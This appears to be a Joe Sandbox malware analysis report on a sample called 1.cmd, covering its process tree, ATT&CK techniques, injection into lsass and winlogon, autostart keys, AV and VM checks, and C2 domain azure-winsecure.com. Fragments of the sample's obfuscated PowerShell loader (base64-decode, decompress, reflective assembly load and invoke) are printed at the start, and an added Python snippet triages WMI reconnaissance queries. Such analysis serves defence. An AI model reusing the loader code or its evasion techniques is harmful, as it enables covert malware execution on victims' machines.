[blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 
'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:amvxseuhmbvc{param([outputtype([type])][parameter(position=0)][type[]]$uiloijomlvxjkf,[parameter(position=1)][type]$qydjyvedmn)$nmmwpnxadvf=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+'f'+'l'+[char](101)+''+[char](99)+'t'+[char](101)+''+'d'+''+[char](68)+''+[char](101)+''+[char](108)+'e'+[char](103)+''+[char](97)+'t'+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+[char](77)+''+[char](101)+'m'+[char](111)+''+[char](114)+''+'y'+''+[char](77)+''+'o'+''+[char](100)+'u'+[char](108)+'e',$false).definetype('m'+[char](121)+'d'+[char](101)+''+[char](108)+''+[char](101)+''+[char](103)+''+[char](97)+''+[char](116)+''+[char](101)+''+[char](84)+'y'+[char](112)+'e',''+'c'+''+[char](108)+''+'a'+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+'ub'+'l'+'i'+[char](99)+','+[char](83)+''+[char](101)+'a'+'l'+''+[char](101)+'d'+[char](44)+'an'+[char](115)+'icla'+'s'+''+[char](115)+','+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+'l'+'as'+[char](115)+'',[multicastdelegate]);$nmmwpnxadvf.defineconstructor('r'+[char](84)+'s'+'p'+''+'e'+''+'c'+''+[char](105)+''+[char](97)+''+[char](108)+''+[char](78)+''+'a'+''+'m'+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+'d'+[char](101)+''+[char](66)+''+[char](121)+'si'+'g'+','+[char](80)+''+[char](117)+'b'+[char](108)+''+'i'+'c',[reflection.callingconventions]::standard,$uiloijomlvxjkf).setimplementationflags('ru'+[char](110)+''+[char](116)+'i'+[char](109)+''+[char](101)+','+'m'+''+[char](97)+''+[char](110)+''+'a'+''+[char](103)+''+[char](101)+''+[char](100)+'');$nmmwpnxadvf.definemethod(''+'i'+''+[char](110)+'v'+'o'+''+[char](107)+'e',''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+'i'+''+'c'+''+[char](44)+'h'+'i'+'d'+[char](101)+''
+[char](66)+'y'+[char](83)+''+[char](105)+''+[char](103)+''+','+''+[char](78)+''+[char](101)+''+[char](119)+'slo'+'t'+','+[char](86)+''+[char](105)+''+[char](114)+''+'t'+''+[char](117)+''+'a'+'l',$qydjyvedmn,$uiloijomlvxjkf).setimplementationflags(''+'r'+'u'+[char](110)+''+'t'+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+'d'+'');write-output $nmmwpnxadvf.createtype();}$swnyxvukgpflw=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+'t'+'e'+''+[char](109)+''+'.'+'d'+'l'+''+'l'+'')}).gettype(''+[char](77)+''+[char](105)+''+'c'+'r'+[char](111)+''+[char](115)+''+[char](111)+''+[char](102)+'t.'+[char](87)+'i'+'n'+''+'3'+''+[char](50)+'.'+'u'+'n'+[char](115)+''+[char](97)+''+'f'+''+'e'+''+[char](78)+''+'a'+''+'t'+''+[char](105)+''+'v'+''+[char](101)+''+[char](77)+''+'e'+''+[char](116)+''+'h'+'o'+[char](100)+'s');$amujszcronxavl=$swny
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,
Source: dwm.exe, 0000002A.00000002.3081128578.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002A.00000000.2467392240.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: conhost.exe, 00000014.00000002.3002498113.000002BCD5CC0000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000001A.00000002.3053496232.000002123BAB0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000027.00000002.3026965971.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Windows\System32\cmd.exe | Code function: 19_3_00000224138E2AF0 cpuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\Windows\System32\Tasks\$rbx-QgS1M4PT VolumeInformation
Source: C:\Windows\System32\cmd.exe | Code function: 19_2_0000022413908090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: Amcache.hve.10.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: dllhost.exe, Amcache.hve.10.dr, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.50.dr | Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
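The WMI evidence above (root\SecurityCenter2 / AntiVirusProduct from powershell.exe, and the Win32_DiskDrive query flagged elsewhere in the report) is the classic "which AV is installed, am I in a VM" reconnaissance step. The following is an added example, not part of the Joe Sandbox report or of the sample: it parses evidence lines in the report's own format, normalizes namespace and class, collapses the repeated identical queries, and maps known namespace/class pairs to ATT&CK techniques. The input lines are constructed for the example (the first two are copied from the report, the rest are invented), and the CLASS_MAP technique assignments are this example's own judgement using standard ATT&CK IDs. Legitimate inventory and monitoring tools query SecurityCenter2 too, so treat a hit as a triage pointer, not a verdict.

```python
"""Classify WQL queries recorded as sandbox evidence (added example, not report code)."""
import re
from collections import Counter

# Constructed input in the shape of the report's evidence lines. Lines 0-1 are
# the report's own; the remaining three are invented to exercise the parser.
SAMPLE_EVIDENCE = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive",
    r"Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_ComputerSystem WHERE Manufacturer = 'VMware, Inc.'",
    r"Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Service WHERE Name = 'Spooler'",
]

# The process path is non-greedy so the flattened report form
# ("powershell.exeWMI Queries:", no space) parses as well as the spaced form.
_LINE = re.compile(
    r"^Source:\s*(?P<proc>\S+?)\s*WMI Queries:\s*IWbemServices::ExecQuery\s*-\s*"
    r"(?P<ns>[^\s:]+)\s*:\s*(?P<wql>.+)$")
# Minimal WQL: SELECT <cols> FROM <class> [WHERE <expr>]
_WQL = re.compile(
    r"^\s*SELECT\s+(?P<cols>.+?)\s+FROM\s+(?P<cls>\w+)(?:\s+WHERE\s+(?P<where>.+))?\s*$",
    re.I)

# (namespace, class) -> (ATT&CK technique, why it matters). Keys are lowercase.
# This mapping is the example's own; the classes themselves are standard WMI.
CLASS_MAP = {
    ("root\\securitycenter2", "antivirusproduct"):
        ("T1518.001 Security Software Discovery", "enumerates registered AV products"),
    ("root\\securitycenter2", "firewallproduct"):
        ("T1518.001 Security Software Discovery", "enumerates registered firewalls"),
    ("root\\securitycenter2", "antispywareproduct"):
        ("T1518.001 Security Software Discovery", "enumerates registered anti-spyware"),
    ("root\\cimv2", "win32_diskdrive"):
        ("T1497 Virtualization/Sandbox Evasion", "disk model/serial reveals virtual disks"),
    ("root\\cimv2", "win32_computersystem"):
        ("T1497 Virtualization/Sandbox Evasion", "manufacturer/model reveals a hypervisor"),
    ("root\\cimv2", "win32_bios"):
        ("T1497 Virtualization/Sandbox Evasion", "BIOS vendor/serial reveals a hypervisor"),
}


def parse_evidence(line):
    """Return a dict with process, namespace, class and WHERE clause, or None."""
    m = _LINE.match(line)
    if not m:
        return None
    w = _WQL.match(m["wql"])
    if not w:
        return None
    return {
        "process": m["proc"].rsplit("\\", 1)[-1].lower(),
        "namespace": m["ns"].lower(),
        "class": w["cls"].lower(),
        "where": w["where"],
    }


def classify(rec):
    """Map a parsed record to (technique, note); unknown classes stay unmapped."""
    return CLASS_MAP.get((rec["namespace"], rec["class"]),
                         ("unmapped", "ordinary WMI use; review only in context"))


def summarize(lines=SAMPLE_EVIDENCE):
    """Collapse repeats and count queries per (process, technique)."""
    counts = Counter()
    for line in lines:
        rec = parse_evidence(line)
        if rec is not None:
            counts[(rec["process"], classify(rec)[0])] += 1
    return dict(counts)


if __name__ == "__main__":
    for (proc, technique), n in sorted(summarize().items()):
        print(f"{n:3d}x {proc:16s} {technique}")
```

The WHERE clause is kept on purpose: a filter such as `Manufacturer = 'VMware, Inc.'` turns a neutral inventory query into an explicit VM check and is worth surfacing in a triage note.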
MITRE ATT&CK matrix: techniques with matching signatures, per tactic (number of matching signatures in parentheses). Matrix cells without a hit are omitted.

Reconnaissance: none
Resource Development: Scripting (1)
Initial Access: none
Execution: Windows Management Instrumentation (12), Native API (12), Command and Scripting Interpreter (22), Scheduled Task/Job (11), PowerShell (1)
Persistence: Scripting (1), DLL Side-Loading (1), Scheduled Task/Job (11), Registry Run Keys / Startup Folder (31)
Privilege Escalation: DLL Side-Loading (1), Access Token Manipulation (1), Process Injection (813), Scheduled Task/Job (11), Registry Run Keys / Startup Folder (31)
Defense Evasion: Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (1), Software Packing (1), DLL Side-Loading (1), File Deletion (1), Rootkit (4), Masquerading (11), Modify Registry (1), Virtualization/Sandbox Evasion (251), Access Token Manipulation (1), Process Injection (813), Hidden Files and Directories (2)
Credential Access: Credential API Hooking (1), Input Capture (11)
Discovery: System Time Discovery (1), File and Directory Discovery (3), System Information Discovery (132), Security Software Discovery (471), Process Discovery (2), Virtualization/Sandbox Evasion (251), Application Window Discovery (1)
Lateral Movement: none
Collection: Archive Collected Data (1), Credential API Hooking (1), Input Capture (11)
Command and Control: Encrypted Channel (2), Non-Application Layer Protocol (1), Application Layer Protocol (1)
Exfiltration: none
Impact: none
Behavior Graph (ID 1525473, sample 1.cmd, start date 04/10/2024, architecture WINDOWS, score 100), rendered as a process tree. Signatures and network/file events are listed under the node they were attributed to; a number after a process name is the graph's per-process created-files/registry-values counter.

Start: 1.cmd
  Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; .NET source code references suspicious native API functions; 14 other signatures
  Network: azure-winsecure.com
  cmd.exe (1)
    Signatures: Suspicious powershell command line found; Suspicious command line found
    powershell.exe (37)
      Dropped: C:\Windows\$rbx-onimai2\$rbx-CO2.bat (DOS)
      Signatures: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Uses schtasks.exe or at.exe to add and modify task schedules; 4 other signatures
      cmd.exe (1)
        Signatures: Suspicious powershell command line found
        powershell.exe
          cmd.exe (1)
            Signatures: Suspicious powershell command line found; Suspicious command line found
            powershell.exe
              Network: azure-winsecure.com, 192.64.119.55, ports 49835, 49993, 50016, NAMECHEAP-NET US, United States
              Dropped: C:\Users\user\AppData\Roaming\...\2024-10-04 (DOS)
              Signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Creates autostart registry keys with suspicious names; Creates an autostart registry key pointing to binary in C:\Windows; 6 other signatures
              powershell.exe
                Signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Injects a PE file into a foreign processes
                conhost.exe
                powershell.exe
              schtasks.exe
                conhost.exe
              WerFault.exe
              WerFault.exe
            WMIC.exe (1)
            WMIC.exe (1)
            4 other processes
        conhost.exe
        cmd.exe (1)
      WerFault.exe (20 16)
    WMIC.exe (1)
    WMIC.exe (1)
    4 other processes
  powershell.exe
    Signatures: Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Found suspicious powershell code related to unpacking or dynamic code loading; Injects a PE file into a foreign processes
    dllhost.exe
      Signatures: Injects code into the Windows Explorer (explorer.exe); Contains functionality to inject code into remote processes; Writes to foreign memory regions; 3 other signatures
      lsass.exe (injected)
        Signatures: Writes to foreign memory regions
      winlogon.exe (injected)
      svchost.exe (injected)
      19 other processes (injected)
    conhost.exe

Source | Detection | Scanner | Label | Link
1.cmd | 4% | ReversingLabs | |
1.cmd | 15% | Virustotal | | Browse

No Antivirus matches (reported three times, once per empty detection table)

Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://upx.sf.net | 0% | URL Reputation | safe |
https://aka.ms/pscore6 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/02/trust | 0% | URL Reputation | safe |
http://schemas.micro | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
azure-winsecure.com | 192.64.119.55 | true | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2BC1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000024.00000002.2457748410.000001C2C3B35000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.10.dr | false | URL Reputation: safe | unknown
http://www.microsoft.co9= | powershell.exe, 0000001A.00000002.3037904696.000002123B5A0000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq | Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.dr | false | | unknown
https://aka.ms/pscore6 | powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, Null.26.dr, Null.7.dr | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.micro | svchost.exe, 00000033.00000000.2527662672.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://Passport.NET/tb | Microsoft-Windows-LiveId%4Operational.evtx.50.dr | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6xGx | powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
192.64.119.55 | azure-winsecure.com | United States | 22612 | NAMECHEAP-NET, US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1525473
Start date and time: 2024-10-04 09:41:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 29s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 42
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 19
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 1.cmd
Detection: MAL
Classification: mal100.spyw.evad.winCMD@55/94@1/1
EGA Information:
  • Successful, ratio: 93.3%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .cmd
  • Excluded processes from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 20.189.173.20, 20.189.173.21, 20.42.65.92, 52.182.143.212
  • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target powershell.exe, PID 2852, because it is empty
  • Not all processes were analyzed; the report is missing behavior information
  • Report creation exceeded the maximum time and may be missing disassembly code information
  • Report size exceeded maximum capacity and may be missing behavior information
  • Report size exceeded maximum capacity and may be missing disassembly code
  • Report size getting too big: too many NtFsControlFile calls found
  • Report size getting too big: too many NtSetInformationFile calls found
Time      Type: Description
03:42:00  API Interceptor: 4x Sleep call for process: WMIC.exe modified
03:42:03  API Interceptor: 22278x Sleep call for process: powershell.exe modified
03:42:22  API Interceptor: 2x Sleep call for process: WerFault.exe modified
03:43:46  API Interceptor: 250x Sleep call for process: winlogon.exe modified
03:43:47  API Interceptor: 222x Sleep call for process: lsass.exe modified
03:43:47  API Interceptor: 1553x Sleep call for process: svchost.exe modified
03:43:49  API Interceptor: 198x Sleep call for process: dwm.exe modified
03:44:00  API Interceptor: 20x Sleep call for process: cmd.exe modified
03:44:00  API Interceptor: 17x Sleep call for process: WMIADAP.exe modified
03:44:00  API Interceptor: 20x Sleep call for process: conhost.exe modified
